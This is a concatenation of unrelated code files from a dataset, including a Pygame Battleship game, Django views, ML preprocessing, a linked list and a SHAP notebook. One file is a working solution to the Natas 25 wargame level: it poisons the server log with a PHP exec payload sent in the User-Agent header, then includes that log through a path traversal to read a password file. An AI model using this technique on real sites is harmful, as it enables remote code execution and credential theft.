    colour-vision profiles (only on first run, when Type is empty)."""
    c.execute("CREATE TABLE IF NOT EXISTS NamesAndScores(Name,Score)")
    c.execute("CREATE TABLE IF NOT EXISTS Type(Name,Number)")
    c.execute("CREATE TABLE IF NOT EXISTS Game(Name,Number)")
    c.execute('SELECT * FROM Type')
    data = c.fetchall()
    if data==[]:
        c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Deuteranope", 0))
        c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Protanope", 0))
        c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Tritanope", 0))
        c.execute("INSERT INTO Type(Name, Number) VALUES (?,?)",("Normal Vision", 0))
    conn.commit()
def dynamic_game_entry():#make game table in data base
    """Seed the Game table with a single ("Games", 0) row on first run."""
    c.execute('SELECT * FROM Game')
    data = c.fetchall()
    if data==[]:
        c.execute("INSERT INTO Game(Name,Number) VALUES (?,?)",("Games",0))
    conn.commit()
def sortSecond(val):
    """Sort key: the second element of *val* (used to rank (name, score) pairs)."""
    return val[1]
def min(first,sec):#check for min value
    """Return the smaller of two values.

    NOTE(review): shadows the builtin ``min``; kept (not renamed) because
    callers in this file use the two-argument form.
    """
    return first if first < sec else sec
def Get_Statistics():#get info from data base
    """Return every (Name, Score) row from the NamesAndScores table."""
    c.execute('SELECT * FROM NamesAndScores')
    return c.fetchall()
def Statistics(): #side function to show players name and scores
    """Render the top-7 scoreboard, then loop handling Back/Quit buttons.

    Bug fix: removed the unreachable ``return "statistics"`` that followed
    the infinite loop.
    """
    gameDisplay.blit(Background,(0,0)) #picture of background
    data = Get_Statistics()
    location=0
    names_and_scores=[]
    Print("Statistics of the Game:",player.color,60,400,50)
    Print("Name Score",player.color,60,400,100)
    for row in data:
        names_and_scores.append((str(row[0]),int(row[1])))
    names_and_scores.sort(key = sortSecond, reverse = True)
    for i in range(min(len(names_and_scores),7)):
        Print(str(i+1)+".",player.color,40,120,175+location)
        Print(names_and_scores[0+i][0],player.color,40,250,175+location)
        Print(str(names_and_scores[0+i][1]),player.color,40,550,175+location)
        location+=50
    while True:
        button("Back",200,500,100,50,player.color,"back1")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Type(): #side function to show type and count of players
    """Show how many players picked each colour-vision profile (admin view)."""
    gameDisplay.blit(Background,(0,0)) #picture of background
    c.execute('SELECT * FROM Type')
    data = c.fetchall()
    location=0
    type_and_number=[]
    Print("Type of Players:",player.color,60,400,50)
    Print("Type: Numbers:",player.color,60,400,100)
    for row in data:
        type_and_number.append((str(row[0]),int(row[1])))
    type_and_number.sort(key = sortSecond, reverse = True)
    for i in range(min(len(type_and_number),4)):
        Print(str(i+1)+".",player.color,40,80,175+location)
        Print(type_and_number[0+i][0],player.color,40,250,175+location)
        Print(str(type_and_number[0+i][1]),player.color,40,550,175+location)
        location+=50
    while True:
        button("Back",200,500,100,50,player.color,"back1")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Games(): #side function
    """Show the total number of games played (admin view)."""
    gameDisplay.blit(Background,(0,0)) #picture of background
    c.execute('SELECT * FROM Game')
    data = c.fetchall()
    Print("Number of Games:",player.color,60,400,50)
    Print("1 . Games : "+str(data[0][1]),player.color,40,150,150)
    while True:
        button("Back",200,500,100,50,player.color,"back1")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Update_table(): #side function to update number of games and player and his score
    """Increment the games counter and persist the player's name and score."""
    c.execute('SELECT * FROM Game')
    data = c.fetchall()
    c.execute("UPDATE Game SET Number = ( ? ) WHERE Name = ( ? ) ",(int(data[0][1])+1,"Games"))
    c.execute("INSERT INTO NamesAndScores(Name, Score) VALUES (?,?)",(player.name, player.score))
    conn.commit()
def Check_Game_Over(shot):#side function to check if the game is over
    """Return True once *shot* shots have been fired (module constant ``shots``)."""
    # Idiom: direct comparison replaces the if/else returning True/False.
    return shot == shots
def Game_over(): #10
    """Persist the result, show the final score, loop handling Back/Quit."""
    Update_table() #update count of games and player and score
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print(player.name+" your scores is : "+str(player.score),player.color,50,400,200)
    Print("Game Over xD ",player.color,60,400,100)
    while True:
        button("Back",200,500,100,50,player.color,"back1")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Get_Miss_Color(color):#side function to get miss color
    """Return the chosen miss colour.

    Bug fix: the original assigned to the *class* attribute
    ``Player.miss_color`` (not the global ``player`` instance), polluting
    the class; callers only use the return value.
    """
    return color
def Pick_Miss_color(board_color): #7 pick color of miss
    """Store the board colour, then loop offering three miss-colour buttons."""
    player.board_color=board_color
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Pick Miss Color: ",player.color,40,300,250)
    while True:
        #user pick color
        button("miss",450,300,100,50,Yellow,"miss")
        button("miss",300,300,100,50,light_yellow,"miss")
        button("miss",150,300,100,50,Dark_yellow,"miss")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Get_Board_Color(color):#side function to get board color
    """Return the chosen board colour.

    Bug fix: the original set the class attribute ``Player.board_color``
    as a side effect; callers only use the return value.
    """
    return color
def Pick_Board_color(ship_color): #6 pick color of the board
    """Store the ship colour, then loop offering three board-colour buttons."""
    player.ship_color=ship_color
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Pick Board Color: ",player.color,40,300,150)
    while True:
        #user pick board color
        button("board",450,220,100,50,Blue,"board")
        button("board",300,220,100,50,Sky_Blue,"board")
        button("board",150,220,100,50,Dark_Blue,"board")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Get_Ship_Color(color):#side function to get ship color
    """Return the chosen ship (hit) colour.

    Bug fix: the original set the class attribute ``Player.ship_color``
    as a side effect; callers only use the return value.
    """
    return color
def Pick_ships_color(): #5 pick color of the hits
    """Loop offering three hit-colour buttons (first step of colour setup)."""
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Pick Ship: ",player.color,40,250,50)
    while True:
        #user pick color for hit
        button("ship",450,105,100,50,Red,"ship")
        button("ship",300,105,100,50,Dark_Red,"ship")
        button("ship",150,105,100,50,light_Red,"ship")
        button("Quit",600,500,100,50,player.color,"quit")
        Exit_check()
def Get_new_Name(new_name):#side function to get new name
    """Return the entered name.

    Bug fix: the original set the class attribute ``Player.name`` as a
    side effect; the caller assigns the return value to ``player.name``
    itself.
    """
    return new_name
def Renaming(): #side function to change name
    """Prompt for a new nickname via the shared text box."""
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Please Enter your new Nickname :",player.color,40,400,150)
    Print("Nickname: ",player.color,40,180,220)
    while True:
        button("Quit",600,500,100,50,player.color,"quit")
        name_text_box(player.color) #text box
        Exit_check()
def name_text_box(color): #side function
    """Interactive text box: collects keystrokes while active and, on
    Enter/Space, validates the entry and routes to the guest or admin menu.
    Never returns normally — navigation happens via the called screens."""
    input_box = pygame.Rect(330, 205, 140, 32) #position of the text box
    active = False
    text = '' #to save the input
    while True:
        for event in pygame.event.get(): #loop to check if click on quit
            if event.type==pygame.QUIT:
                pygame.quit()
                quit()
            if event.type == pygame.MOUSEBUTTONDOWN:
                # If the user clicked on the input_box rect.
                if input_box.collidepoint(event.pos):
                    # Toggle the active variable.
                    active = not active
                else:
                    active = False
            if event.type == pygame.KEYDOWN: #get the text
                if active:
                    if event.key == pygame.K_BACKSPACE:
                        text = text[:-1]
                    elif event.key==pygame.K_KP_ENTER or event.key==pygame.K_SPACE:
                        # Commit the name, then route by role/validity.
                        player.name=Get_new_Name(text) #after press enter go to admin/guest
                        if text=="":
                            wrong_input()
                        elif player.user=="guest":
                            Guest_Menu()
                        elif player.user=="ADMIN" and text=="admin":
                            Admin_Menu()
                        elif player.user=="ADMIN" and player.rename==1:
                            Admin_Menu()
                        elif player.user=="ADMIN" and text!="admin":
                            wrong_input()
                    else:
                        # Any other key while active: append the character.
                        text += event.unicode
        font = pygame.font.Font(None, 32)
        txt_surface = font.render(text, True, color)
        # Grow the box to fit the typed text (min 200 px).
        width = max(200, txt_surface.get_width()+10)
        input_box.w = width
        gameDisplay.blit(txt_surface, (input_box.x+5, input_box.y+5))
        pygame.draw.rect(gameDisplay, color, input_box, 2)
        Exit_check()
def Guest_Menu(): #4
    """Guest main menu: rename, play, contact, stats, logout, quit."""
    player.stage=1
    player.score=0
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Player : "+player.name,player.color,60,400,150)
    while True:
        button("Renaming",50,50,200,50,player.color,"renaming")
        button("Play",300,200,200,100,player.color,"play")
        button("Get in touch",550,50,200,50,player.color,"get in touch")
        button("Quit",600,500,100,50,player.color,"quit")
        button("Logout",475,500,100,50,player.color,"logout")
        button("Statistics",350,500,100,50,player.color,"Statistics")
        Exit_check()
def Check_Logout(action):#side function to check true and false
    """Return True iff *action* is the logout action.

    Bug fix: the original's else branch was the bare expression ``False``
    (no ``return``), so it returned None for non-logout actions.
    """
    return action == "logout"
def Check_Get_in_touch(action):#side function to check true and false
    """Return True iff *action* is the contact-page action (idiom: direct comparison)."""
    return action == "get in touch"
def Admin_Menu(): #4
    """Admin main menu: guest options plus Types and Games reports."""
    player.stage=2
    player.rename=1
    player.score=0
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Admin : "+player.name,player.color,60,400,150)
    while True:
        button("Renaming",50,50,200,50,player.color,"renaming")
        button("Play",300,200,200,100,player.color,"play")
        button("Get in touch",550,50,200,50,player.color,"get in touch")
        button("Quit",600,500,100,50,player.color,"quit")
        button("Logout",475,500,100,50,player.color,"logout")
        button("Statistics",480,400,100,50,player.color,"Statistics")
        button("Types",350,400,100,50,player.color,"Type")
        button("Games",220,400,100,50,player.color,"Games")
        Exit_check()
def Guest_Login(): #3
    """Guest login screen: any non-empty nickname is accepted."""
    player.user="guest"
    player.stage=1
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Please Enter your Info:",player.color,60,400,150)
    Print("Nickname:",player.color,40,180,220)
    while True:
        button("Quit",600,500,100,50,player.color,"quit")
        name_text_box(player.color) #text box
        Exit_check()
def wrong_input(): #to let the user he enter wrong input
    """Error screen shown for an empty or invalid name entry."""
    player.stage=0
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("You Enter Wrong Info",player.color,60,400,150)
    Print("go back and try again",player.color,60,400,250)
    while True:
        button("Quit",600,500,100,50,player.color,"quit")
        button("Back",200,500,100,50,player.color,"back1")
        Exit_check()
def Admin_Login(): #3
    """Admin login screen: only the username "admin" is accepted (see name_text_box)."""
    player.user="ADMIN"
    player.stage=2
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Please Enter your Info:",player.color,60,400,150)
    Print("Username:",player.color,40,180,220)
    while True:
        button("Quit",600,500,100,50,player.color,"quit")
        name_text_box(player.color) #text box
        Exit_check()
def Get_in_touch(): #side function to get info
    """Static contact-information screen."""
    gameDisplay.blit(Background,(0,0))
    Print("Ways to Contact:",player.color,60,400,150)
    Print("Mail = help@battleship.help ",player.color,40,400,200)
    Print("phone = 0204060 ",player.color,40,400,250)
    while True:
        button("Quit",600,500,100,50,player.color,"quit")
        button("Back",200,500,100,50,player.color,"back1")
        Exit_check()
def Print(text,color,font_size,cord1,cord2):#function to print for the user
    """Render *text* centred at (cord1, cord2) onto the game display."""
    latgetext=pygame.font.Font('freesansbold.ttf',font_size) #font and size
    textSurface=latgetext.render(text,True,color)
    TextRect=textSurface.get_rect()
    TextRect.center=(cord1,cord2)
    gameDisplay.blit(textSurface,TextRect) #display the text
def Get_user_Color(color):
    """Identity passthrough, kept for symmetry with the other Get_* helpers."""
    return color
def Start_Game(color):#2
    """Welcome screen after colour-profile selection; offers guest/admin login."""
    player.color=Get_user_Color(color)
    player.rename=0
    player.stage=0
    gameDisplay.blit(Background,(0,0)) #picture of background
    Print("Welcome to Battleship",player.color,60,400,150)
    while True:
        button("Guest",480,220,90,50,player.color,"guest")
        button("Login",220,220,90,50,player.color,"login")
        button("Quit",600,500,100,50,player.color,"quit")
        button("Back",100,500,100,50,player.color,"back")
        button("Statistics",50,50,100,50,player.color,"Statistics")
        button("Get in touch",550,50,200,50,player.color,"get in touch")
        Exit_check()
def User_Pick(): #1
    """First screen: pick a colour-vision profile (one of four swatches).

    NOTE(review): PickBackground is blitted *after* the colour buttons each
    frame, which appears to paint over them — confirm the draw order is
    intended.
    """
    #seed the Game table in the database
    dynamic_game_entry()
    while True:
        #user pick type of color blindness
        button("Color1",75,180,140,150,Yellow,"color")
        button("Color2",333,175,140,150,Yellow,"color")
        button("Color3",575,175,140,150,Red,"color")
        button("Color4",332,400,140,150,Red,"color")
        gameDisplay.blit(PickBackground,(0,0))
        button("Quit",600,500,100,50,White,"quit")
        Exit_check()
def Check_Exit(TrueOrFales):#side function to check for exit
    """Return True iff the argument equals True (callers pass a literal).

    Idiom: the if/else returning True/False collapses to the comparison;
    ``== True`` (not ``bool()``) preserves the original semantics exactly.
    """
    return TrueOrFales == True
def Exit_check(): #check if click on exit and update display
    """Handle window-close events, flip the display, and cap the frame rate."""
    for event in pygame.event.get(): #loop to check if click on quit
        if event.type==pygame.QUIT:
            pygame.quit()
            quit()
    pygame.display.update()
    clock.tick(FPS)
# Program entry: set up the DB, run the UI, then tidy up on exit.
create_tables()
User_Pick()
pygame.quit()
c.close()   # bug fix: `c.close` referenced the method without calling it
conn.close()
998,178 | 07ca3bcbf9d17a26cf576984aa36104bfa0e4a4d | calificaciones = {"calculo": 10, "dibujo": 5}
# Sum the two grades and compute their mean.
sumaCalificaciones = calificaciones.get("calculo") + calificaciones.get("dibujo")
totalNota = sumaCalificaciones / 2
# Prints the higher grade ("calculo"), the other grade, and the average.
print("El promedio mayor es calculo: ", calificaciones.get("calculo"), '\n', calificaciones.get("dibujo"), '\n', totalNota)
998,179 | 3923a1046583d2898b6bdb64243fa9aee1a65bb4 | from django.views.generic.base import TemplateView
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import authentication, permissions
from api.models import Member
from api.serializers import UserSerializer
from authentication import QuietBasicAuthentication
from easy_pdf.views import PDFTemplateView
from reportlab.pdfgen import canvas
from django.http import HttpResponse
from pdf_generator import generate_pdf
class IndexView(TemplateView):
    """Serve the single-page app shell (index.html)."""
    template_name = "index.html"
class AuthView(APIView):
    """Basic-auth login endpoint: echoes the authenticated user's data."""
    authentication_classes = (QuietBasicAuthentication,)
    serializer_class = UserSerializer
    def post(self, request, *args, **kwargs):
        # DRF populates request.user from the Basic credentials.
        return Response(self.serializer_class(request.user).data)
class HelloPDFView(PDFTemplateView):
    """Render pdf_template.html as a PDF (easy_pdf demo view)."""
    template_name = "pdf_template.html"
def pdf_view(request, pk):
    """Stream a generated PDF for the Member with primary key *pk* as an
    attachment download.

    NOTE(review): `member` is fetched but unused here — presumably
    generate_pdf re-queries by pk; confirm and drop the lookup if so.
    """
    member = Member.objects.get(id=pk)
    # Create the HttpResponse object with the appropriate PDF headers.
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename="somefilename.pdf"'
    # Delegate the actual drawing to the pdf_generator helper, which writes
    # into the response as a file-like object.
    generate_pdf(response, pk)
    return response
998,180 | dbf010209a585ca953bb2092271e93fa2778584e | import cv2
# Live preview from camera index 1; press 'q' to quit.
cap = cv2.VideoCapture(1)
while True:
    ok, frame = cap.read()
    if not ok:
        # Bug fix: the read status was discarded; imshow on a failed
        # frame (None) raises, so bail out when the camera stops.
        break
    cv2.imshow("Camera", frame)
    if cv2.waitKey(10) == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
998,181 | 85f9436227040564788d24c38a3b5518b57538c8 | import numpy as np
# Random integer arrays for experimenting with broadcasting and slicing.
A = np.random.randint(0, 10, size=(3, 2))
B = np.random.randint(0, 10, size=(3, 3, 3))
C = np.random.randint(0, 10, size=(3, 1))
# print(A**2)
# print(np.sqrt(A))
# print(A)
# print(C)
# print(A + C)
# print(B + C)
print(B)
# In-place subtraction on a 2x2 sub-block of every 3x3 slice of B.
B[:, 0:2, 0:2] -= 20
print(B)
|
998,182 | 994cd8fbb4dbdb67ff6a6e4223e5018bcf5a64f1 | """
Pre-processing, part 1:
Using the THUCNews (Tsinghua) corpus, build news data for 10 classes,
extracting the 50k samples needed from the corpus source files.
"""
import os
import shutil
# Map of Chinese category directory names to English class names.
class_list = {'财经': 'Economics', '房产': 'House', '社会': 'Society', '时尚': 'Fashion', '教育': 'Education',
              '科技': 'Technology', '时政': 'Politics', '体育': 'PE', '游戏': 'Game', '娱乐': 'Entertainment'}
for class_name, class_name_en in class_list.items():
    # Source directory for this category inside the THUCNews dump.
    dir_path = 'D:/下载/THUCNews/THUCNews/' + class_name
    file_list = os.listdir(dir_path)
    print(class_name + ':' + str(len(file_list)))
    # First 5000 files per class -> training set, renamed 0.txt..4999.txt.
    if not os.path.exists('source_data_train/' + class_name_en):
        os.mkdir('source_data_train/' + class_name_en)
    for i in range(5000):
        print(i)
        shutil.copy(dir_path + '/' + file_list[i], 'source_data_train/' + class_name_en + '/' + str(i) + '.txt')
    # Next 5000 files per class -> test set, re-indexed from 0.
    if not os.path.exists('source_data_test/' + class_name_en):
        os.mkdir('source_data_test/' + class_name_en)
    for i in range(5000, 10000):
        print(i)
        shutil.copy(dir_path + '/' + file_list[i], 'source_data_test/' + class_name_en + '/' + str(i - 5000) + '.txt')
# class_name = '社会'
# class_name_en = 'Society'
# dir_path = 'D:/下载/THUCNews/THUCNews/' + class_name
# file_list = os.listdir(dir_path)
# print(class_name + ':' + str(len(file_list)))
#
# if not os.path.exists('source_data_train/' + class_name_en):
# os.mkdir('source_data_train/' + class_name_en)
# for i in range(5000):
# print(i)
# shutil.copy(dir_path + '/' + file_list[i], 'source_data_train/' + class_name_en + '/' + str(i) + '.txt')
#
# if not os.path.exists('source_data_test/' + class_name_en):
# os.mkdir('source_data_test/' + class_name_en)
# for i in range(5000, 10000):
# print(i)
# shutil.copy(dir_path + '/' + file_list[i], 'source_data_test/' + class_name_en + '/' + str(i - 5000) + '.txt')
|
998,183 | e3ed13673c44664007218104d153448ccccef9cf | #!/usr/bin/python3
import requests

# OverTheWire Natas level 25 -> 26: log-poisoning via the User-Agent header
# combined with a path-traversal in the `lang` parameter.
username = "natas25"
password = "GHF6X7YwACaYYssHVY05cFq83hRktl4c"
url = 'http://'+username+'.natas.labs.overthewire.org/'
info = 'http://'+username+'.natas.labs.overthewire.org/var/www/natas/natas25/logs/natas25_'
session = requests.session()
data = {'lang' : '../etc/natas_webpass/natas26'}
#response = session.post(url , data = {'lang' : '../etc/natas_webpass/natas26'},auth = (username, password))
# Initial GET just to obtain a PHPSESSID (names the server-side log file).
response = session.get(url ,auth = (username, password))
content = response.text
print("The PHPSESSID of this session is:\t"+session.cookies['PHPSESSID'])
cook = str(session.cookies['PHPSESSID'])
print("="*50)
#headers = {"User-Agent" : "<?php system('cat /etc/natas_webpass/natas26'); ?>"}
# PHP payload written into the log via User-Agent, then the log is included
# through the traversal-filtered `lang` parameter ('..././' survives the filter).
headers = {"User-Agent" : "<?php echo exec('cat /etc/natas_webpass/natas26'); ?>"}
response = session.post(url, headers = headers ,data = {'lang' : '..././..././..././..././..././var/www/natas/natas25/logs/natas25_'+cook+'.log'} , auth = (username, password))
content = response.text
print(content)
|
998,184 | 80caafddd1f27cb6cff631a9e7f44c65989b8410 | # Introduction: How H1st.AI enables the Industrial AI Revolution
This tutorial will teach you how H1st AI can help solve the Cold Start problem in domains where labeled data is not available or prohibitively expensive to obtain.
One example of such a domain is cybersecurity, which is increasingly looking forward to adopting ML to detect intrusions. Another domain is predictive maintenance, which tries to anticipate industrial machine failures before they happen. In both domains, labels are expensive because fundamentally these occurrences are rare and costly (as compared to NLP, where labels such as sentiment are common and can be obtained e.g. via crowdsourcing or weak supervision).
Yet this is a fundamental challenge of Industrial AI.
<img src="http://docs.arimo.com/H1ST_AI_Tutorial/img/batman h1st.ai.jpg" alt="H1st.AI woke meme" style="float: left; margin-right: 20px; margin-bottom: 20px;" width=320px height=320px>
Jurgen Schmidhuber, one of AI & deep learning's pioneer, [remarked in his 2020s outlook that](http://people.idsia.ch/~juergen/2010s-our-decade-of-deep-learning.html#Sec.%207) in the last decade AI "excelled in virtual worlds, e.g., in video games, board games, and especially on the major WWW platforms", but the main challenge for the next decades is for AI to be "driving industrial processes and machines and robots".
As pioneers in Industrial AI who regularly work with massive global fleets of IoT equipment, Arimo & Panasonic whole-heartedly agree with this outlook. Importantly, many industrial AI use cases with significant impact have become urgent and demand solutions now, which requires a fresh approach. We will work on one such example in this tutorial: detecting intrusions in automotive cybersecurity.
We’ll learn that using H1st.AI we can tackle these problems and make it tractable by leveraging human experience and data-driven models in a harmonious way. Especially, we’ll learn how to:
* Perform use-case analysis to decompose problems and adopt different models at the right level of abstractions
* Encode human experience as a model
* Combine human and ML models to work in tandem in a H1st.Graph
Too many tutorials, especially data science ones, start out with some toy applications and the really basic stuff, and then stall out on the more complex real-world scenarios. This one is going to be different.
So, grab a cup of coffee before you continue :)
If you can't wait, go ahead and [star our Github repository](https://github.com/h1st-ai/h1st) and check out the "Quick Start" section. We're open-source!
```{toctree}
:hidden:
:titlesonly:
Automotive Cybersecurity - A Cold Start Problem.ipynb
Monolithic AD & ML Approaches and Why They are Unsatisfactory.ipynb
Using H1st.AI to Encode Human Insights as a Model and Harmonize Human + ML in a H1st.Graph.ipynb
Summary & Further Resources
```
|
998,185 | 36182f4eefe3a27364f75bf1b251f8a8584224ae | '''
Doubly linked list (ADT).
'''
class DoublyLinkedList(object):
    """Doubly linked list built around header/trailer sentinel nodes.

    The sentinels never hold data; real nodes always live between them,
    which removes the edge cases from insertion and deletion.
    """

    class Node(object):
        '''
        Data input (referenced as the node below) can be of any format (or within
        any other data type.)
        '''
        def __init__(self, data = None, prev = None, next = None):
            self.data = data
            self.prev = prev
            self.next = next

        def disconnect(self):
            # Drop every reference so a removed node cannot reach the list
            # afterwards and can be garbage-collected promptly.
            self.data = None
            self.prev = None
            self.next = None

    def __init__(self):
        '''
        Since the header and trailer nodes (or sentinels) are purely for position,
        they do not hold data.
        '''
        self.header = DoublyLinkedList.Node()
        self.trailer = DoublyLinkedList.Node()
        self.header.next = self.trailer
        self.trailer.prev = self.header
        self.size = 0

    def __len__(self):
        return self.size

    def is_empty(self):
        return (len(self) == 0)

    #---------------------First and Last Data Nodes-----------------------
    def first_node(self):
        '''
        Returns the first node of a Doubly Linked List that holds data.
        Raises Exception on an empty list.
        '''
        if (self.is_empty()):
            raise Exception("List is empty!")
        else:
            return self.header.next

    def last_node(self):
        '''
        Returns the last node of a Doubly Linked List that holds data.
        Raises Exception on an empty list.
        '''
        if (self.is_empty()):
            raise Exception("List is empty!")
        else:
            return self.trailer.prev

    #---------------------Adding Data------------------------------------
    def add_after(self, node, data):
        '''
        Insert `data` in a new node right after `node`; returns the new node.
        Helper for every other insertion method.
        '''
        prev = node
        succ = node.next
        new_node = DoublyLinkedList.Node(data, prev, succ)
        prev.next = new_node
        succ.prev = new_node
        self.size += 1
        return new_node

    def add_first(self, data):
        return self.add_after(self.header, data)

    def add_last(self, data):
        return self.add_after(self.trailer.prev, data)

    def add_before(self, node, data):
        return self.add_after(node.prev, data)

    def insert_sorted(self, elem):
        '''
        Insert `elem` into a list kept in ascending order.

        Bug fixes versus the previous version:
        * an empty list no longer raises (first_node() was called before any
          node existed);
        * the scan now stops after a single insertion (the old loop never
          advanced past a matching node and inserted forever);
        * elements greater than every existing value are appended (the old
          end-of-list comparison was inverted).
        '''
        cursor = self.header.next
        # Walk to the first node whose data is >= elem; if none exists the
        # cursor stops on the trailer and the insert becomes an append.
        # This also handles the empty list (header.next is the trailer).
        while cursor is not self.trailer and cursor.data < elem:
            cursor = cursor.next
        self.add_before(cursor, elem)

    #---------------------Deleting Data---------------------------------
    def delete_node(self, node):
        '''
        Unlink `node` from the list and return the data it held.
        '''
        pred = node.prev
        succ = node.next
        pred.next = succ
        succ.prev = pred
        self.size -= 1
        data = node.data
        node.disconnect()
        return data

    def delete_first(self):
        if (self.is_empty()):
            raise Exception("List is empty!")
        return self.delete_node(self.first_node())

    def delete_last(self):
        if (self.is_empty()):
            raise Exception("List is empty!")
        return self.delete_node(self.last_node())

    #---------------------Traversal-------------------------------------
    def __iter__(self):
        '''
        Yields each node's data from first to last.
        '''
        if (self.is_empty()):
            return
        cursor = self.first_node()
        while cursor is not self.trailer:
            yield cursor.data
            cursor = cursor.next

    def __repr__(self):
        return "[" + " <--> ".join([str(item) for item in self]) + "]"
'''
lnk_lst1=DoublyLinkedList()
lnk_lst1.add_first(4)
lnk_lst1.add_first(2)
lnk_lst1.add_last(7)
lnk_lst1.add_last(3)
lnk_lst1.add_last([1,2,3])
print(lnk_lst1)
lnk_lst1.delete_first()
print(lnk_lst1)
lnk_lst2 = DoublyLinkedList()
lnk_lst2.add_first(13)
print(lnk_lst2.__len__())
lnk_lst2 = DoublyLinkedList()
lnk_lst2.add_first(2)
lnk_lst2.add_last(4)
print(lnk_lst2)
lnk_lst2.insert_sorted(3)
print(lnk_lst2)
'''
if __name__ == "__main__":
import doctest
doctest.testmod() |
998,186 | c04d587ec5b211eabcc7a217a5b49e9a023ef501 | from numpy import mean
from numpy import std
import numpy as np
import pandas as pd
import sklearn
import math
import os
from sklearn.metrics import log_loss, accuracy_score, classification_report
from sklearn.metrics import matthews_corrcoef, make_scorer, roc_auc_score, roc_curve
from sklearn.model_selection import KFold, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn import datasets,linear_model,preprocessing
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from xgboost import XGBClassifier
from sklearn.model_selection import KFold
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split as split
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LinearRegression, LogisticRegression, Lasso, Ridge
""" Hello, tutor. I used google colab to train and test, I imported the csv file from google drive
if you want to test the .csv on you pc, you probably need to
change the file path , thanks
"""
from google.colab import drive

# Mount Google Drive so the competition CSVs can be read.
drive.mount('/content/drive')
Train = pd.read_csv('/content/drive/MyDrive/9417 Proj/train.csv')
Test = pd.read_csv('/content/drive/MyDrive/9417 Proj/test.csv')
Sample = pd.read_csv('/content/drive/MyDrive/9417 Proj/sampleSubmission.csv')

print(Train.head())
print("Train Set Shape:",end="")
print(Train.shape)
print(Test.head())
print("Test Set Shape:",end="")
# BUG FIX: this previously printed Train.shape under the "Test Set Shape" label.
print(Test.shape)

# Correlation heatmap of the raw training columns.
plt.figure(figsize=(10, 8))
sns.heatmap(Train.corr(), annot=True,cmap="GnBu_r")

'''Split Train into Train_Y and Train_X
Train_Y is the first column 'ACTION'
Train_X is the combination of other columns
Test_X is the combination after Test drops column 'id'
'''
Train_Y = Train["ACTION"]
Train_X = Train.drop("ACTION",axis=1)
Column_ID = Test["id"]
Test_X = Test.drop("id",axis=1)

# Hold out 20% for validation, stratified on the target.
Train_X, Valid_X, Train_Y, Valid_Y = split(Train_X, Train_Y, test_size=0.2, random_state=0, stratify=Train_Y)

print("Train set after pre-processing:",end="")
print(Train_X.head())
print("Test set after pre-processing:",end="")
print(Test_X.head())

Train_X1, Train_Y1 = np.array(Train_X), np.array(Train_Y)
Valid_X1, Valid_Y1 = np.array(Valid_X), np.array(Valid_Y)

# Boxplot each numeric column to eyeball outliers.
for i in Train_X.describe().columns:
    sns.boxplot(Train_X[i].dropna(), color='g')
    plt.show()

import catboost
from catboost.eval.evaluation_result import *
from catboost import CatBoostClassifier, Pool, MetricVisualizer

# All nine feature columns are categorical IDs.
P1 = Pool(data=Train_X, label=Train_Y, cat_features=[0,1,2,3,4,5,6,7,8])

# NOTE(review): `Model` is never defined in this file -- presumably a fitted
# CatBoostClassifier trained in a missing notebook cell. Verify before running.
values = Model.get_feature_importance(data=P1, type='ShapValues')
# Last column of the SHAP matrix holds the expected value; the rest are
# per-feature contributions.
expected_val = values[1,-1]
shap_val = values[:,:-1]

# Sample index 1
import shap
shap.initjs()
shap.force_plot(expected_val, shap_val[1,:], Train_X.iloc[1,:])

# Sample index 50
import shap
shap.initjs()
values = Model.get_feature_importance(data=P1, type='ShapValues')
expected_val = values[50,-1]
shap_val = values[:,:-1]
shap.force_plot(expected_val, shap_val[50,:], Train_X.iloc[50,:])

import shap
shap.initjs()
values = Model.get_feature_importance(data=P1, type='ShapValues')
shap_val = values[:,:-1]
shap.summary_plot(shap_val, Train_X, plot_type="bar")
shap.summary_plot(shap_val, Train_X)

# BUG FIX: the following calls previously referenced undefined names
# `shap_values`/`expected_value`; the arrays computed above are
# `shap_val`/`expected_val`.
shap.dependence_plot("RESOURCE", shap_val, Train_X, interaction_index=None)
shap.dependence_plot("MGR_ID", shap_val, Train_X, interaction_index=None)
shap.dependence_plot("ROLE_DEPTNAME", shap_val, Train_X, interaction_index=None)
shap.dependence_plot("ROLE_TITLE", shap_val, Train_X,interaction_index=None)
shap.dependence_plot("ROLE_FAMILY_DESC", shap_val, Train_X, interaction_index=None)

import shap
shap.initjs()
x_small = Train_X.iloc[0:200]
shap_small = shap_val[:200]
shap.force_plot(expected_value, shap_small, x_small) |
998,187 | 80063c3bb4646b380579899f24b1649d13f8f374 | print("Hello World!\n Just testing the work folder and commands to run via terminal") |
998,188 | 471d141d97d5a5d70da45429f0ab2ca0b89f28ff | """
68. Ward法によるクラスタリングPermalink
国名に関する単語ベクトルに対し,Ward法による階層型クラスタリングを実行せよ.
さらに,クラスタリング結果をデンドログラムとして可視化せよ.
"""
from scipy.cluster.hierarchy import linkage, dendrogram
from knock67 import make_dataframe, collect_countries
import matplotlib.pyplot as plt
import pandas as pd
if __name__ == "__main__":
    # Column 0 of the frame holds country names; the remaining columns hold
    # the word-vector components for each country.
